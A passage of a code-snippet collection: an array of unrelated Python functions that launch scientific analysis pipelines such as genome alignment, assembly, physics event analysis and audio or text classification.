[ "def main(self):\n try:\n self.parse_args()\n self.run()\n return 0\n except AnalysisBackendError as e:\n L.error(e)\n return 1", "def run_analysis(self, argv):\n self._run_argparser(argv)\n self.run()", "def run(self) :\n# print \"evaluating with laban\"\n # currently, labanx reads from a preset file\n os.system('labanx '+str(self.rank)+\" \"+self.input+\" \"+self.output)", "def run(self) -> None:\n barcoded = BarcodedFilename.from_sample(self.analysis.sample)\n\n if barcoded.analyte == Analyte.RNASEQ:\n if self.analysis.parameters[\"rnaseq_aligner\"] == RnaSeqAligner.STAR:\n self.star()\n else:\n raise Exception(\"unexpected aligner for this type of sample\")\n else:\n if self.analysis.parameters[\"aligner\"] == GenericAligner.NOVOALIGN:\n self.novoalign()\n elif self.analysis.parameters[\"aligner\"] == GenericAligner.BWA:\n self.bwa()\n else:\n raise Exception(\"unexpected aligner for this type of sample\")", "def executeAnalysis(config, samples, visitor):\n # store cuts in \"info\" (re-created from TQCuts)\n # ROOT.xAOD.clearTransientTrees()\n #nEventsProcessed = 0\n\n CLI = config.getFolder(\"CLI+\")\n\n # flag indicating to run analysis in debug mode\n debug = CLI.getTagBoolDefault(\"debug\",False)\n # flag indicating to run a dummy analysis\n dummy = CLI.getTagBoolDefault(\"dummy\",False)\n\n downmerge = CLI.getTagBoolDefault(\"downmerge\",False)\n downmergeTo = CLI.getTagStandardStringDefault(\"downmergeTo\",\"\")\n\n pathselect = CLI.getTagVStandardString(\"pathselect\")\n\n if debug:\n maxEvents = 100\n else:\n maxEvents = config.getTagIntegerDefault(\"maxEvents\",-1)\n\n # proceed with analysis\n appname = QFramework.TQLibrary.getApplicationName().Data()\n visitor.setVisitTraceID(appname)\n if maxEvents > 0:\n QFramework.WARN(\"setting maximum number of events per sample to {:d}\".format(maxEvents))\n visitor.setMaxEvents(maxEvents)\n QFramework.TQLibrary.allowRedirection(False)\n timer = ROOT.TStopwatch()\n nsamples = 0\n if pathselect.size() > 0:\n paths = ROOT.TString(\",\".join(map(str,pathselect)))\n else:\n # Read in sample folder restrictions and convert to a single comma-\n # separated string, the same format as it would be passed in via CLI.\n # Can't use `join` since this is a vector<TString>\n # Can't read in the field as a single string with getTagString,\n # perhaps since it has commas\n paths = \"\"\n for path in config.getTagVString(\"restrict\"):\n paths += path.Data() + \",\"\n paths = ROOT.TString(paths[:-1])\n if paths.Length() != 0:\n if not dummy:\n nsamples = samples.visitSampleFolders(visitor,paths)\n QFramework.TQLibrary.recordMemory()\n QFramework.TQObservable.clearAll()\n QFramework.TQLibrary.recordMemory()\n if downmerge or downmergeTo:\n downmergeTargets = downmergeTo\n if not downmergeTargets:\n downmergeTargets = paths\n samples.setTag(\".generalize.histograms\",True,downmergeTargets)\n samples.setTag(\".generalize.cutflow\",True,downmergeTargets)\n else:\n QFramework.WARN(\"dummy run, skipping execution of cutbased analysis on paths '{:s}'\".format(pathselect))\n else:\n if not dummy:\n nsamples = samples.visitMe(visitor)\n QFramework.TQLibrary.recordMemory()\n else:\n QFramework.WARN(\"dummy run, skipping execution of cutbased analysis on root sample folder\")\n\n # TODO: put the rest of this in a separate function like for post processing?\n # right now nsamples is returned but nothing is done with it\n if nsamples > 0:\n if downmerge or downmergeTo:\n samples.generalizeObjects(\".generalize\")\n timer.Stop()\n\n # TODO: put this section in its own function (with cuts available)\n # just get cuts from visitor? (will need to provide a channel in the MCASV case I think)\n if config.getTagBoolDefault(\"checkRun\",True):\n\n if dummy:\n allevents = QFramework.TQCounter(\"dummy\",0,0,0)\n else:\n if isinstance(visitor,QFramework.TQAnalysisSampleVisitor):\n allevents = samples.getCounter(\".\",visitor.getBaseCut().GetName())\n elif isinstance(visitor,QFramework.TQMultiChannelAnalysisSampleVisitor):\n channels = config.getTagVString(\"channels\")\n allevents = samples.getCounter(\".\",visitor.getBaseCut(channels[0]).GetName())\n\n if nsamples > 0:\n # debugging printout\n # TODO: make separate method?\n if config.getTagBoolDefault(\"printCounterValues\",False):\n samples.printListOfCounters()\n printhists = config.getTagVString(\"printHistogramsASCII\")\n for hist in printhists:\n h = samples.getHistogram(\".\",hist)\n if h:\n QFramework.TQHistogramUtils.printHistogramASCII(h)\n else:\n QFramework.ERROR(\"unable to access histogram '{:s}'\".format(hist))\n\n else:\n QFramework.ERROR(\"execution of analysis finished but might have failed, no samples were visited successfully (they might simply be empty).\")\n runtime = config.getFolder(\"runtime+\")\n # store in runtime folder the fact that no samples were visited in the form of an error string\n analysisError = \"execution of analysis finished but might have failed, no samples were visited successfully (they might simply be empty).\"\n runtime.setTagString(\"analysisError\", analysisError)\n #don't quit just now, but instead we'll write an alternative output file later which basically states \"job didn't crash but there is a small chance something went wrong\"\n #quit()\n\n #return nEventsProcessed\n return nsamples", "def runsbeana(self):", "def run_analys(global_config, sample_config):\n # check that what I am going to run is available on the path and on the \n # global config\n common._check_pipeline(sample_config, global_config)\n pipeline = sample_config[\"pipeline\"] # pipeline/analysis to be executed\n # this stopped to --> workgetattr(__import__(command), \"run\")\n command_fn = getattr(globals()[pipeline], \"run\")\n command_fn(global_config, sample_config)", "def run_all(self):\n\n self.run_mash() ###Run MASH analysis\n self.filter_query() ###Filter fasta sequences out based on p value\n self.build_index(self.filtered_out_path) ###Build index for off-target analysis\n os.remove(self.filtered_out_path) ###Clean up intermediate fasta file\n self.format_gRNA(self.path1) ###Format everything in the right order\n self.run_OTF() ###Run off-target analysis\n self.output_parse() ###Parse output values and update table", "def single_analysis(config, name):\n # graphviz = GephiOutput()\n graphviz = GraphvizOutput()\n graphviz.output_file = name\n\n print \"Preparing test case...\"\n radio, lines = _prepare_test_case()\n\n print \"Running test case...\"\n with PyCallGraph(output=graphviz, config=config):\n _run_test_case(radio, lines)", "def test_pandaseq_assembly(self):\n\n # write temp files\n self.writeTmpFastq(self.test_fn1, self.test_fn2)\n\n ### Run with recomended default function params ##\n params = {}\n params['-f'] = self.test_fn1\n params['-r'] = self.test_fn2\n \n pandaseq_app = PandaSeq(params=params,\n WorkingDir=self.temp_dir_string)\n\n pandaseq_app.Parameters['-F'].on()\n\n res = pandaseq_app([self.test_fn1, self.test_fn2])\n\n # assembly is sent to StdOut, check output\n self.assertEqual(res['StdOut'].read(), expected_default_assembly)\n \n res.cleanUp()\n\n ### Run with altered params ###\n # run with out -F option (output is FASTA format)\n params2 = {}\n params2['-f'] = self.test_fn1\n params2['-r'] = self.test_fn2\n \n pandaseq_app2 = PandaSeq(params=params2,\n WorkingDir=self.temp_dir_string)\n \n res2 = pandaseq_app2([self.test_fn1, self.test_fn2])\n\n # assembly is sent to StdOut, check output\n self.assertEqual(res2['StdOut'].read(), expected_default_assembly_fasta)\n \n res2.cleanUp()\n shutil.rmtree(self.temp_dir_string)", "def main():\n subcommands = {\n \"train\": train.train,\n \"tune\": train_tune.train,\n \"predict\": predict.cli_predict,\n \"evaluate\": evaluate.cli_evaluate,\n \"version\": version,\n }\n\n try:\n import xarray_behave.gui.app\n\n subcommands[\"gui\"] = xarray_behave.gui.app.main_das\n except (ImportError, ModuleNotFoundError):\n logging.exception(\"No GUI avalaible.\")\n # fall back to function that displays helpful instructions\n subcommands[\"gui\"] = no_xb_gui\n\n logging.basicConfig(level=logging.INFO, force=True)\n defopt.run(subcommands, show_defaults=False)", "def bct_analysis():\n # Detect the number of active documents.\n num_active_docs = detect_active_docs()\n # Get labels with their ids.\n id_label_map = \\\n FileManagerModel().load_file_manager().get_active_labels_with_id()\n\n # Fill in default options.\n if 'analyoption' not in session:\n session['analyoption'] = constants.DEFAULT_ANALYZE_OPTIONS\n if 'bctoption' not in session:\n session['bctoption'] = constants.DEFAULT_BCT_OPTIONS\n\n try:\n from lexos.models.bct_model import BCTModel\n # Use a black hole variable to hold the model to get rid of warning.\n _ = BCTModel()\n # Render the HTML template.\n return render_template(\n 'bct_analysis.html',\n itm=\"bct-analysis\",\n labels=id_label_map,\n numActiveDocs=num_active_docs\n )\n except ImportError:\n return render_template(\n 'bct_analysis_import_error.html',\n itm=\"bct-analysis\"\n )", "def run(bmark):\r\n raise Exception(\"Not implemented\")", "def call(args) :\n from caller import bam_call\n bam_call(args)", "def run_analysis(self, query, key=None):\n logger.info(\"Running analysis on query...\")\n core_annotation = Annotation(query, key)\n clf_pipeline = AnalysisPipeline()\n entity_pipeline = AnalysisPipeline()\n clf = self.clf_accessor.get_classification_pipeline('multiclass', 'intent_classifier')\n\n \"\"\" Create the IntentClassificationAnnotator using the pipeline 'clf' \"\"\"\n clf_annotator = IntentClassificationAnnotator('clf', clf)\n clf_pipeline.add_annotator(clf_annotator)\n \"\"\" Run clf_pipeline to obtain intent classification \"\"\"\n core_annotation = clf_pipeline.analyze(core_annotation)\n \"\"\" Ensure classification results exists, otherwise raise AnalyzerError \"\"\"\n if core_annotation.annotations['results']['classification'] is []:\n raise AnalyzerError(\"No intent classification results.\")\n \"\"\" Create annotators based on entity types of intent classification \"\"\"\n entities = core_annotation.annotations['entity_types']\n\n \"\"\" Obtain gazetteers associated with the given key \"\"\"\n gazetteers = self.gaz_accessor.get_gazeteers(key)\n\n logger.debug(\"Core annotation intents: {0}\".format(core_annotation.annotations['results']['classification']))\n logger.debug(\"Core annotation entities: {0}\".format(core_annotation.annotations['entity_types']))\n logger.debug(\"Core annotation stopwords: {0}\".format(core_annotation.annotations['stopwords']))\n\n \"\"\" Iterate over entities and create an the appropriate Annotator based on the entity_type \"\"\"\n for entity in entities:\n \"\"\" Access the binary classifier for the appropriate entity types and create BinaryClassifierAnnotator\"\"\"\n if entity['entity_type'] == 'binary_classifier':\n logger.debug(\"Creating BinaryClassificationAnnotator for: {0}\".format(entity['entity_name']))\n clf = self.clf_accessor.get_classification_pipeline('binary_classifier', entity['entity_name'])\n binary_clf_annotator = BinaryClassificationAnnotator(entity['entity_name'], clf)\n entity_pipeline.add_annotator(binary_clf_annotator)\n\n \"\"\" Create a RegexAnnotator for each regex entity type\"\"\"\n if entity['entity_type'] == 'regex':\n logger.debug(\"Creating RegexAnnotator for: {0}\".format(entity['entity_name']))\n regex_annotator = RegexAnnotator(entity['entity_name'], Regexer(entity['regular_expressions']))\n entity_pipeline.add_annotator(regex_annotator)\n\n \"\"\" Create a BinaryRegexAnnotator for each regex entity type\"\"\"\n if entity['entity_type'] == 'binary_regex':\n logger.debug(\"Creating BinaryRegexAnnotator for: {0}\".format(entity['entity_name']))\n regex_annotator = BinaryRegexAnnotator(entity['entity_name'], Regexer(entity['regular_expressions']))\n entity_pipeline.add_annotator(regex_annotator)\n\n \"\"\" Create a NaiveNumberAnnotator for each number entity type\"\"\"\n if entity['entity_type'] == 'number':\n logger.debug(\"Creating NaiveNumberAnnotator for: {0}\".format(entity['entity_name']))\n number_annotator = NaiveNumberAnnotator(entity['entity_name'], NumberExtractor())\n entity_pipeline.add_annotator(number_annotator)\n\n \"\"\" Create a FuzzyMatchAnnotator for each fuzzy_match entity type\"\"\"\n if entity['entity_type'] == 'fuzzy_match':\n logger.debug(\"Creating FuzzyFindAnnotator for: {0}\".format(entity['entity_name']))\n logger.debug(\"Entity Keywords: {}\".format(entity['keywords']))\n fuzzy_matcher_annotator = FuzzyMatcherAnnotator(entity['entity_name'], FuzzyMatcher(), entity['keywords'])\n entity_pipeline.add_annotator(fuzzy_matcher_annotator)\n\n \"\"\" Create a DatetimeAnnotator for each number entity type\"\"\"\n if entity['entity_type'] == 'datetime':\n logger.debug(\"Creating DatetimeAnnotator for: {0}\".format(entity['entity_name']))\n duckling_instance = self.duckling_factory.getDucklingInstance()\n parser = DucklingDatetimeParser(duckling_instance)\n datetime_annotator = DatetimeAnnotator(entity['entity_name'], parser)\n entity_pipeline.add_annotator(datetime_annotator)\n\n \"\"\" Access the gazetteer for the appropriate entity types and create an GazetteerAnnotator \"\"\"\n if entity['entity_type'] == 'gazetteer' or entity['entity_type'] == 'simple_gazetteer':\n if gazetteers is not None:\n logger.debug(\"Creating GazetteerAnnotator for: {0}\".format(entity['entity_name']))\n \"\"\" Check to make sure gazetteers contains the gazetteer type to avoid key error \"\"\"\n if entity['entity_name'] in gazetteers.keys():\n gaz_annotator = GazetteerAnnotator(entity['entity_name'], gazetteers[entity['entity_name']])\n entity_pipeline.add_annotator(gaz_annotator)\n\n core_annotation = entity_pipeline.analyze(core_annotation)\n return core_annotation.annotations['results']", "def run(self, verbose=0):\n self.verbose = verbose\n self._preproc()\n self._lda()\n self._evaluate()", "def main():\n args = parse_args(sys.argv[1:])\n\n if args.version:\n print(birdvoxclassify.version.version)\n return\n\n if args.quiet:\n logger_level = 30\n elif args.verbose:\n logger_level = 20\n else:\n logger_level = 25\n\n run(args.inputs,\n output_dir=args.output_dir,\n output_summary_path=args.output_summary_path,\n model_name=args.model_name,\n batch_size=args.batch_size,\n select_best_candidates=args.select_best_candidates,\n hierarchical_consistency=args.hierarchical_consistency,\n suffix=args.suffix,\n logger_level=logger_level)", "def run_analysis(wf):\n if wf.analysis[\"type\"] == \"one_sample_tests\":\n start_one_sample_tests(wf)\n\n elif wf.analysis[\"type\"] == \"two_sample_tests\":\n start_two_sample_tests(wf)\n\n elif wf.analysis[\"type\"] == \"factorial_tests\":\n start_factorial_tests(wf)\n\n elif wf.analysis[\"type\"] == \"n_sample_tests\":\n start_n_sample_tests(wf)\n\n info(\"> Finished analysis\")", "def main():\n\t#ps = PackageScanner()\n\t#packages = ps.getInstalledPackages()\n\t#print(packages)\n\t#ps.saveScanResults()\n\n\tan = Analyzer()\n\tan.loadFromFile(config.PKG_SCAN_DIR / config.PKG_SCAN_FILE)\n\t#an.loadFromPackageCont(packages)\n\tan.analyze()\n\tan.saveAnalysisResults()", "def run():\n import hmmmAssembler ; reload(hmmmAssembler) # import helpers\n hmmmAssembler.main(Random) # this runs the code!", "def run(self,infilename): \n ### initizlize the analysis\n self.init_analysis(infilename)\n ### run the analysis\n self.run_analysis()\n ### store selected results\n self.store_results()\n return", "def run(self, fileStore):\n work_dir = fileStore.getLocalTempDir()\n fastaFile = os.path.join(work_dir, 'seq.fa')\n fileStore.readGlobalFile(self.fastaID, fastaFile)\n\n # download the model\n modelFile = os.path.join(work_dir, 'model.knm')\n assert os.environ.get(\"CACTUS_DNA_BRNN_MODEL_ID\") is not None \n modelID = os.environ.get(\"CACTUS_DNA_BRNN_MODEL_ID\")\n fileStore.readGlobalFile(modelID, modelFile)\n\n # ignore existing model flag\n if '-i' in self.dnabrnnOpts:\n i = self.dnabrnnOpts.index('-i')\n del self.dnabrnnOpts[i]\n del self.dnabrnnOpts[i]\n\n cmd = ['dna-brnn', fastaFile] + self.dnabrnnOpts.split() + ['-i', modelFile]\n \n if self.cores:\n cmd += ['-t', str(self.cores)]\n\n bedFile = os.path.join(work_dir, 'regions.bed')\n\n # run dna-brnn to make a bed file\n cactus_call(outfile=bedFile, parameters=cmd)\n\n if self.mergeLength is None:\n self.mergeLength = 0\n if self.minLength is None:\n self.minLength = 0\n \n # merge up the intervals into a new bed file\n mergedBedFile = os.path.join(work_dir, 'filtered.bed')\n merge_cmd = []\n merge_cmd.append(['awk', '{{if($3-$2 > {}) print}}'.format(self.minLength), bedFile])\n merge_cmd.append(['bedtools', 'sort', '-i', '-'])\n merge_cmd.append(['bedtools', 'merge', '-i', '-', '-d', str(self.mergeLength)]) \n cactus_call(outfile=mergedBedFile, parameters=merge_cmd)\n\n maskedFile = os.path.join(work_dir, 'masked.fa')\n \n if self.action in ('softmask', 'hardmask'):\n mask_cmd = ['cactus_fasta_softmask_intervals.py', '--origin=zero', bedFile]\n if self.minLength:\n mask_cmd += ['--minLength={}'.format(self.minLength)]\n if self.action == 'hardmask':\n mask_cmd += ['--mask=N']\n # do the softmasking\n cactus_call(infile=fastaFile, outfile=maskedFile, parameters=mask_cmd)\n else:\n assert self.action == \"clip\"\n # to clip, we need a bed of the regions we want to *keep*. We'll start with the whole thing\n allRegionsFile = os.path.join(work_dir, 'chroms.bed')\n cactus_call(parameters=['samtools', 'faidx', fastaFile])\n cactus_call(outfile=allRegionsFile, parameters=['awk', '{print $1 \"\\\\t0\\\\t\" $2}', fastaFile + '.fai'])\n # load the contig lengths\n contig_lengths = {}\n with open(fastaFile + '.fai', 'r') as fai:\n for line in fai:\n toks = line.strip().split('\\t')\n contig_lengths[toks[0]] = int(toks[1])\n # now we cut out the regions\n clippedRegionsFile = os.path.join(work_dir, 'clipped.bed')\n cactus_call(outfile=clippedRegionsFile, parameters=['bedtools', 'subtract', '-a', allRegionsFile, '-b', mergedBedFile])\n # now we make a fiadx input regions\n faidxRegionsFile = os.path.join(work_dir, 'faidx_regions.txt')\n with open(clippedRegionsFile, 'r') as clipFile, open(mergedBedFile, 'a') as mergeFile, open(faidxRegionsFile, 'w') as listFile:\n for line in clipFile:\n toks = line.strip().split(\"\\t\")\n if len(toks) > 2:\n seq, start, end = toks[0], int(toks[1]), int(toks[2])\n if end - start > self.minLength or contig_lengths[seq] <= self.minLength:\n region = seq\n if end - start < contig_lengths[seq]:\n # go from 0-based end exlusive to 1-based end inclusive when\n # converting from BED to samtools region\n region += ':{}-{}'.format(start + 1, end)\n else:\n assert start == 0 and end == contig_lengths[seq]\n listFile.write('{}\\n'.format(region))\n else:\n # the region was too small, we remember it in our filtered bed file\n mergeFile.write(line)\n # and cut the fasta apart with samtools\n cactus_call(outfile=maskedFile, parameters=['samtools', 'faidx', fastaFile, '-r', faidxRegionsFile])\n \n return fileStore.writeGlobalFile(maskedFile), fileStore.writeGlobalFile(bedFile), fileStore.writeGlobalFile(mergedBedFile)", "def bwa(self) -> None:\n self.analysis.logger.info(\"Running alignment with BWA\")\n self.chdir()\n config = self.analysis.config\n executor = Executor(self.analysis)\n executor(\n f\"{config.bwa} mem -t 6 -L 5,10 -v 1 {{genome_ref}} \"\n f\"{{input_filename}}> {{output_filename}}\",\n input_function=lambda l: \" \".join(sorted(l)),\n input_split_reads=False,\n output_format=f\"{self.analysis.basename}{{organism_str}}.sam\",\n split_by_organism=True,\n only_human=self.only_human,\n unlink_inputs=True,\n )\n self.analysis.logger.info(\"Alignment finished. Aligner used: BWA\")", "def _cmd_bintest(args):\n cnarr = read_cna(args.cnarray)\n segments = read_cna(args.segment) if args.segment else None\n sig = do_bintest(cnarr, segments, args.alpha, args.target)\n tabio.write(sig, args.output or sys.stdout)", "def RUN(self):", "def run(config=None):\n AlignmentWorkflow().run(config)", "def __call__(self, seq_path, result_path=None, log_path=None):\r\n raise NotImplementedError(\"Aligner is an abstract class\")", "def skesa_assemble(self):\n with progressbar(self.metadata) as bar:\n for sample in bar:\n # Initialise the assembly command\n sample.commands.assemble = str()\n try:\n if sample.general.trimmedcorrectedfastqfiles:\n # If the sample is a pure isolate, assemble it. Otherwise, run the pre-metagenome pipeline\n try:\n status = sample.run.Description\n except AttributeError:\n status = 'unknown'\n if status == 'metagenome':\n self.merge(sample)\n else:\n # Set the output directory\n sample.general.assembly_output = os.path.join(sample.general.outputdirectory,\n 'assembly_output')\n make_path(sample.general.assembly_output)\n sample.general.assemblyfile = os.path.join(sample.general.assembly_output,\n '{name}_unfiltered.fasta'\n .format(name=sample.name))\n sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output,\n '{name}.fasta'\n .format(name=sample.name))\n fastqfiles = sample.general.trimmedcorrectedfastqfiles\n\n # Set the the forward fastq files\n sample.general.assemblyfastq = fastqfiles\n forward = fastqfiles[0]\n gz = True if '.gz' in forward else False\n # If there are two fastq files\n if len(fastqfiles) == 2:\n # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7\n sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\\n '--use_paired_ends --vector_percent 1 ' \\\n '--contigs_out {contigs}'\\\n .format(fastqfiles=','.join(fastqfiles),\n threads=self.cpus,\n contigs=sample.general.assemblyfile)\n # Same as above, but use single read settings for the assembler\n else:\n sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\\n '--vector_percent 1 --contigs_out {contigs}'\\\n .format(fastqfiles=','.join(fastqfiles),\n threads=self.cpus,\n contigs=sample.general.assemblyfile)\n # Specify that the files are gzipped\n if gz:\n sample.commands.assemble += ' --gz'\n # If there are no fastq files, populate the metadata appropriately\n else:\n sample.general.assembly_output = 'NA'\n sample.general.assemblyfastq = 'NA'\n sample.general.bestassemblyfile = 'NA'\n except AttributeError:\n sample.general.assembly_output = 'NA'\n sample.general.assemblyfastq = 'NA'\n sample.general.trimmedcorrectedfastqfiles = 'NA'\n sample.general.bestassemblyfile = 'NA'\n if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile):\n # Run the assembly\n out, err = run_subprocess(sample.commands.assemble)\n write_to_logfile(sample.commands.assemble,\n sample.commands.assemble,\n self.logfile,\n sample.general.logout,\n sample.general.logerr,\n None,\n None)\n write_to_logfile(out,\n err,\n self.logfile,\n sample.general.logout,\n sample.general.logerr,\n None,\n None)", "def main():\n # Define Parser object and add to Toil\n parser = argparse.ArgumentParser(description=main.__doc__, formatter_class=argparse.RawTextHelpFormatter)\n subparsers = parser.add_subparsers(dest='command')\n # Generate subparsers\n subparsers.add_parser('generate-config', help='Generates an editable config in the current working directory.')\n subparsers.add_parser('generate-manifest', help='Generates an editable manifest in the current working directory.')\n subparsers.add_parser('generate', help='Generates a config and manifest in the current working directory.')\n # Run subparser\n parser_run = subparsers.add_parser('run', help='Runs the BWA alignment pipeline')\n group = parser_run.add_mutually_exclusive_group()\n parser_run.add_argument('--config', default='config-toil-bwa.yaml', type=str,\n help='Path to the (filled in) config file, generated with \"generate-config\".')\n group.add_argument('--manifest', default='manifest-toil-bwa.tsv', type=str,\n help='Path to the (filled in) manifest file, generated with \"generate-manifest\". '\n '\\nDefault value: \"%(default)s\".')\n group.add_argument('--sample', nargs='+', action=required_length(2, 3),\n help='Space delimited sample UUID and fastq files in the format: uuid url1 [url2].')\n # Print docstring help if no arguments provided\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n Job.Runner.addToilOptions(parser_run)\n args = parser.parse_args()\n # Parse subparsers related to generation of config and manifest\n cwd = os.getcwd()\n if args.command == 'generate-config' or args.command == 'generate':\n generate_file(os.path.join(cwd, 'config-toil-bwa.yaml'), generate_config)\n if args.command == 'generate-manifest' or args.command == 'generate':\n generate_file(os.path.join(cwd, 'manifest-toil-bwa.tsv'), generate_manifest)\n # Pipeline execution\n elif args.command == 'run':\n require(os.path.exists(args.config), '{} not found. Please run generate-config'.format(args.config))\n if not args.sample:\n args.sample = None\n require(os.path.exists(args.manifest), '{} not found and no sample provided. '\n 'Please run \"generate-manifest\"'.format(args.manifest))\n # Parse config\n parsed_config = {x.replace('-', '_'): y for x, y in yaml.load(open(args.config).read()).iteritems()}\n config = argparse.Namespace(**parsed_config)\n config.maxCores = int(args.maxCores) if args.maxCores else sys.maxint\n samples = [args.sample[0], args.sample[1:]] if args.sample else parse_manifest(args.manifest)\n # Sanity checks\n require(config.ref, 'Missing URL for reference file: {}'.format(config.ref))\n require(config.output_dir, 'No output location specified: {}'.format(config.output_dir))\n # Launch Pipeline\n Job.Runner.startToil(Job.wrapJobFn(download_reference_files, config, samples), args)", "def run (self, bioseqs, *clargs):\t\t\n\t\t## Preconditions:\n\t\tassert (2 <= len (bioseqs))\n\t\t## Main:\n\t\tself._inseqs = bioseqs\n\t\tself.call_cmdline (*clargs)", "def binAnalysis(self):\n self.mode = 'binned'\n # --------------------------------------------------------------------------------------------- #\n # Make sure that another working directory is selected\n if self.workpath == self.datapath:\n print(\"\\t=== Variable 'self.workpath' is equal to 'self.datapath', provide another ===\")\n return\n else:\n if os.path.isfile(self.outgtlike):\n print(\"\\t=== Directory {} already contains a complete analysis, remove the .dat file ===\".format(self.workpath))\n return\n else:\n pass\n print(\"\\t=== Binned analysis will be computed in '{}' ===\".format(self.workpath))\n\n # --------------------------------------------------------------------------------------------- #\n # Create a temporary python script and launch the Science Tools\n fil = os.path.join(self.workpath, 'tmp_BinnedAnalysis'+self.suffix+'.py')\n tmp = open(fil, 'w')\n tmp.write(\"import algamma; import os; a=algamma.algamma(); a.ft1='{}';\\\n a.ft2='{}'; a.metstart={}; a.metstop={}; a.emin={}; a.emax={}; a.suffix='{}';\\\n a.workpath='{}'; a._gtSelect(); a._gtMktime();\\\n a._gtLtcube(); a._gtBincube(); a._gtExpmap(); a._gtSrcmap();\\\n a._gtLike(); os.remove('{}')\".format(self.ft1, self.ft2, \n self.metstart, self.metstop, self.emin, self.emax,\n self.suffix, self.workpath, fil))\n # Launch the file\n os.popen(\"nohup python {} &\".format(fil))\n tmp.close()\n\n return", "def analysis_setup(self):\n pass", "def test_init_analysis(network):\n bf_init_analysis(\"test_analysis\", _stable_question_dir)", "def main():\r\n\tlang = get_arguments()\r\n\twiki_analyzer(lang)", "def main(aligner):\n\n # load config file\n config = file_utils.load_json(\n os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n 'config',\n 'normal_config.json',\n ))\n\n # map of type of analyses required before particular analysis can run\n # note: keep this order to avoid checking requirements more than once\n required_analyses_map = {\n 'annotation': [\n 'hmmcopy',\n 'align',\n ],\n 'hmmcopy': ['align'],\n 'align': [],\n }\n\n # get colossus analysis information objects with status not complete\n analyses = colossus_api.list(\n \"analysis_information\",\n analysis_run__run_status_ne=\"complete\",\n aligner=aligner if aligner else config[\"default_aligner\"],\n )\n\n for analysis in analyses:\n # get library id\n library_id = analysis[\"library\"][\"pool_id\"]\n log.info(f\"{library_id}\")\n\n # skip analysis if marked as complete\n status = analysis[\"analysis_run\"][\"run_status\"]\n\n # skip analyses older than this year\n # parse off ending time range\n last_updated_date = parser.parse(analysis[\"analysis_run\"][\"last_updated\"][:-6])\n if last_updated_date < datetime(2020, 1, 1):\n continue\n\n jira_ticket = analysis[\"analysis_jira_ticket\"]\n log.info(f\"checking ticket {jira_ticket} library {library_id}\")\n for analysis_type in required_analyses_map:\n log.info(f\"checking requirements for {analysis_type}\")\n # check if analysis exists on tantalus\n try:\n tantalus_analysis = tantalus_api.get(\n 'analysis',\n jira_ticket=jira_ticket,\n analysis_type__name=analysis_type,\n )\n except:\n tantalus_analysis = None\n\n if tantalus_analysis is not None:\n # check if running or complete\n status = tantalus_analysis[\"status\"]\n if status in ('running', 'complete'):\n log.info(f\"skipping {analysis_type} for {jira_ticket} since status is {status}\")\n\n # update run status on colossus\n if analysis_type == \"annotation\" and status == \"complete\":\n analysis_run_id = analysis[\"analysis_run\"][\"id\"]\n analysis_run = colossus_api.get(\"analysis_run\", id=analysis_run_id)\n colossus_api.update(\"analysis_run\", id=analysis_run_id, run_status=\"complete\")\n\n continue\n\n log.info(f\"running {analysis_type} in library {library_id} with ticket {jira_ticket}\")\n # otherwise run analysis\n saltant_utils.run_analysis(\n tantalus_analysis['id'],\n analysis_type,\n jira_ticket,\n config[\"scp_version\"],\n library_id,\n aligner if aligner else config[\"default_aligner\"],\n config,\n )\n else:\n # set boolean determining trigger of run\n is_ready_to_create = True\n # check if required completed analyses exist\n for required_analysis_type in required_analyses_map[analysis_type]:\n try:\n required_analysis = tantalus_api.get(\n 'analysis',\n jira_ticket=jira_ticket,\n analysis_type__name=required_analysis_type,\n status=\"complete\",\n )\n except:\n log.error(\n f\"a completed {required_analysis_type} analysis is required to run before {analysis_type} runs for {jira_ticket}\"\n )\n # set boolean as false since analysis cannot be created yet\n is_ready_to_create = False\n break\n\n # create analysis and trigger on saltant if analysis creation has met requirements\n if is_ready_to_create:\n log.info(f\"creating {analysis_type} analysis for ticket {jira_ticket}\")\n\n try:\n tantalus_utils.create_qc_analyses_from_library(\n library_id,\n jira_ticket,\n config[\"scp_version\"],\n analysis_type,\n )\n except Exception as e:\n log.error(f\"failed to create {analysis_type} analysis for ticket {jira_ticket}\")\n continue\n tantalus_analysis = tantalus_api.get(\n 'analysis',\n jira_ticket=jira_ticket,\n analysis_type__name=analysis_type,\n )\n\n log.info(f\"running {analysis_type} in library {library_id} with ticket {jira_ticket}\")\n saltant_utils.run_analysis(\n tantalus_analysis['id'],\n analysis_type,\n jira_ticket,\n config[\"scp_version\"],\n library_id,\n aligner if aligner else config[\"default_aligner\"],\n config,\n )\n\n # get completed analyses that need montage loading\n analyses = colossus_api.list(\n \"analysis_information\",\n montage_status=\"Pending\",\n analysis_run__run_status=\"complete\",\n )\n\n for analysis in analyses:\n # get library id\n library_id = analysis[\"library\"][\"pool_id\"]\n\n # skip analyses older than this year\n # parse off ending time range\n last_updated_date = parser.parse(analysis[\"analysis_run\"][\"last_updated\"][:-6])\n if last_updated_date < datetime(2020, 1, 1):\n continue\n\n jira_ticket = analysis[\"analysis_jira_ticket\"]\n update_jira_dlp(jira_ticket, \"M\")\n # upload qc report to jira ticket\n attach_qc_report(jira_ticket, library_id, config[\"storages\"])\n\n # load analysis into montage\n load_ticket(jira_ticket)", "def main(args):\n print('loading {}'.format(args.stem_path))\n y, fs = librosa.load(args.stem_path, sr=44100)\n notes = mono_anal(y, fs)\n jam = output_to_jams(y, fs, notes, args)\n jam_path = args.stem_path.split('.')[0]+'.jams'\n jam.save(jam_path)\n print('jams file generated')\n return 0", "def run_real(self):\n\n if len(self.args) == 1:\n slice_file = \"-\"\n seq_file = self.args[0]\n elif len(self.args) == 2:\n slice_file = self.args[0]\n seq_file = self.args[1]\n else:\n self.parser.print_help()\n return 1\n\n self.load_sequences(seq_file)\n self.process_file(slice_file)", "def initiateAnalysis(self,):\n\n #\n # Imports\n #\n import os\n import sys\n\n #\n # get optional arguments from commandline\n #\n self.getComandLineOptions()\n \n #\n # for logmessages\n #\n tmpLogMessages = ['----------------\\n']\n tmpLogMessage = self.createLogHeader()\n tmpLogMessages.append(tmpLogMessage)\n #print tmpLogMessage\n \n #\n # check analysis path\n #\n if os.path.isdir(self.analysisPath):\n tmpLogMessage = 'WARNING: the analysis path already exists.\\n'\n 